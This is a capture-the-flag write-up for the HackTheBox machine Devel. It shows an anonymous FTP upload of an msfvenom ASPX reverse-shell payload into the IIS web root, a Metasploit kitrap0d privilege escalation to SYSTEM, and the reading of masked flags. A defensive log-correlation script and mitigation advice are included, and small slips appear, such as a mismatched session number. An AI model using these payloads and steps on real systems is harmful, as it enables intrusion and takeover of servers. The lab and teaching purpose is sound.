WriteUp: HackTheBox Devel

This is my second box on HackTheBox. There are probably a couple of different ways to exploit it, but I went with the FTP path as FTP is known to be a weak spot. Maybe later I will come back and try to exploit it over HTTP (if that is possible at all). We first exploit a misconfiguration that gives us a low-privileged user on the box. As that user, we then exploit a privilege escalation vulnerability that allows us to become SYSTEM.

Table of Contents

  1. Reconnaissance
  2. Enumeration
  3. Exploitation
  4. Privilege Escalation
  5. Post Exploitation
  6. Defender’s Note

Reconnaissance

We’ll start with checking which open ports are available to us.

$ nmap -A -T4 -p- 10.10.10.5

We get the following output.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see that anonymous FTP login is allowed and that the HTTP server permits the TRACE method. Nmap also identifies the exact web server: Microsoft IIS 7.5.

Enumeration

Since anonymous logon is enabled on the FTP server, that is the low-hanging fruit to start with.

FTP

Let’s try logging in with anonymous as both the username and the password.

$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:badmin): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

And we are in. Let’s verify whether we can list files on the server and, more importantly, whether we can upload files to it.

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> put test.txt 
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

Exploitation

FTP

Since the web server is IIS, let’s use msfvenom to generate a reverse shell payload in ASPX format, which IIS will execute when the page is requested.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f aspx > example.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2896 bytes
$ ls example.aspx 
example.aspx

The file *example.aspx* is generated in the current folder. Before uploading it, we start a Metasploit handler that will catch the reverse connection on port 4444.

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.6       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Let’s run this.

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:4444 

The listener is up, so let’s switch back to the FTP session and upload the file to the server.

ftp> put example.aspx 
local: example.aspx remote: example.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2933 bytes sent in 0.00 secs (1.2526 MB/s)

Since the FTP root is the IIS web root, the uploaded file is reachable over HTTP. Let’s make the server execute the payload by navigating to http://10.10.10.5/example.aspx.

On the listener, we see that a session has been opened.

[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.5:49158) at 2021-06-24 08:51:04 +0100
meterpreter > 
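The chain above (an anonymous FTP upload into the IIS web root, followed by an HTTP request for that same file) is easy to correlate from the server’s own logs. The following is an added example for defenders, not code from the writeup or from HackTheBox; it assumes the W3C field layouts of IIS 7.5 FTP and HTTP logs, and the sample log lines are constructed to mirror this box rather than captured from it.

```python
"""Detect the Devel chain: an anonymous FTP upload of server-side script content
into the IIS webroot followed by an HTTP request that makes IIS execute it."""
from datetime import datetime, timedelta

# Extensions IIS hands to the ASP.NET/ASP handlers when requested over HTTP.
EXECUTABLE_EXT = (".aspx", ".asp", ".ashx", ".asmx")

def parse_w3c(text):
    """Parse W3C extended log text (IIS FTP and HTTP logs) into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.strip().splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other directives (#Software, #Date) and blank lines
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows

def _stamp(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def find_upload_then_execute(ftp_log, http_log, window=timedelta(hours=1)):
    """One alert per completed FTP STOR of executable content that an HTTP request hit within `window`."""
    uploads = [r for r in parse_w3c(ftp_log)
               if r["cs-method"] == "STOR" and r["sc-status"] == "226"  # 226 = transfer complete
               and r["cs-uri-stem"].lower().endswith(EXECUTABLE_EXT)]
    requests = parse_w3c(http_log)
    alerts = []
    for up in uploads:
        name = up["cs-uri-stem"].lstrip("/").lower()
        for req in requests:
            delta = _stamp(req) - _stamp(up)
            if req["cs-uri-stem"].lstrip("/").lower() == name and timedelta(0) <= delta <= window:
                alerts.append({"file": name, "uploader": up["cs-username"], "upload_src": up["c-ip"],
                               "request_src": req["c-ip"], "seconds_later": int(delta.total_seconds())})
    return alerts

# Constructed sample logs in the IIS 7.5 W3C field layout (not captured from the box).
FTP_LOG = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-06-24 07:45:12 10.10.14.6 anonymous 10.10.10.5 21 PASS *** 230 0 0 1a2b3c /
2021-06-24 07:46:30 10.10.14.6 anonymous 10.10.10.5 21 STOR test.txt 226 0 0 1a2b3c /test.txt
2021-06-24 07:49:02 10.10.14.6 anonymous 10.10.10.5 21 STOR example.aspx 226 0 0 1a2b3c /example.aspx
"""
HTTP_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-06-24 07:50:03 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.6 Mozilla/5.0 200 0 0 5
2021-06-24 07:50:41 10.10.10.5 GET /example.aspx - 80 - 10.10.14.6 Mozilla/5.0 200 0 0 312
"""
```

The benign text.txt upload is ignored; only the .aspx upload that was subsequently requested over HTTP produces an alert, which is the moment the box went from file write to code execution.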

When we check the system details and user id, we see that we are running as the IIS application pool identity, not as SYSTEM.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privilege Escalation

Now that we have a session, we can use post modules to try and escalate privileges. Searching for “suggester” shows that there is exactly one module of interest.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

Let’s go ahead and use that module. The options require that we set the session number we want to interact with.
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...

Once the module runs, it lists a number of local exploits that could apply to this box.

[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

We’ll go with ms10_015_kitrap0d, which exploits a Windows kernel vulnerability from 2010 (MS10-015) to escalate privileges. In addition to the session number, we need to set LHOST to our address on the tun0 (VPN) interface, because the module defaults to a different interface.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.176.95   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.6
LHOST => 10.10.14.6

Everything is set now. Let’s run the module.

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Launching notepad to host the exploit...
[+] Process 632 launched.
[*] Reflectively injecting the exploit DLL into 632...
[*] Injecting exploit into 632 ...
[*] Exploit injected. Injecting payload into 632...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:4444 -> 10.10.10.5:49163) at 2021-06-24 09:02:56 +0100

We now have a new session, and this time getuid reports that we are running as NT AUTHORITY\SYSTEM.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

Let’s drop down to the shell to interact with the Windows machine.

meterpreter > shell
Process 1024 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv> cd ../../..
 cd ../../..

Let’s see which user profiles exist on the box. Besides the service accounts, we have Administrator and babis.

c:\>cd Users    
cd Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users

18/03/2017  02:16 ��    <DIR>          .
18/03/2017  02:16 ��    <DIR>          ..
18/03/2017  02:16 ��    <DIR>          Administrator
17/03/2017  05:17 ��    <DIR>          babis
18/03/2017  02:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  10:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  22.198.059.008 bytes free

User Flag

The user flag is normally located on the desktop of a regular user (C:\Documents and Settings\User\Desktop on older Windows versions; on this box it is C:\Users\babis\Desktop). So we traverse to the desktop of user “babis”. Once in the directory, we see the “user.txt.txt” file, which we can read with the “type” command.

c:\Users\babis>cd Desktop
cd Desktop

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  02:14 ��    <DIR>          .
18/03/2017  02:14 ��    <DIR>          ..
18/03/2017  02:18 ��                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.197.534.720 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecddXXXXXXXXXXXXXXf4cb3e8

Root flag

The root flag is normally located on the Administrator’s desktop (C:\Documents and Settings\Administrator\Desktop on older Windows versions; here it is C:\Users\Administrator\Desktop). Once in the directory, we see the “root.txt” file, which we can read with the “type” command.

c:\Users\babis\Desktop>cd ../../
cd ../../

c:\Users>cd Administrator
cd Administrator

c:\Users\Administrator>cd Desktop
cd Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

14/01/2021  12:42 ��    <DIR>          .
14/01/2021  12:42 ��    <DIR>          ..
18/03/2017  02:17 ��                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.190.256.128 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0XXXXXXXXXXXXXXXbc72b4b

Defender’s Note

  1. FTP is an insecure protocol as it sends credentials and data in clear text. Opt for more secure alternatives such as SFTP or FTPS.
  2. If you have to use FTP, disable anonymous login on the FTP server. On this box the anonymous-writable FTP root is also the IIS web root, which is what turns a file upload into code execution.
  3. Patch systems in a timely manner.
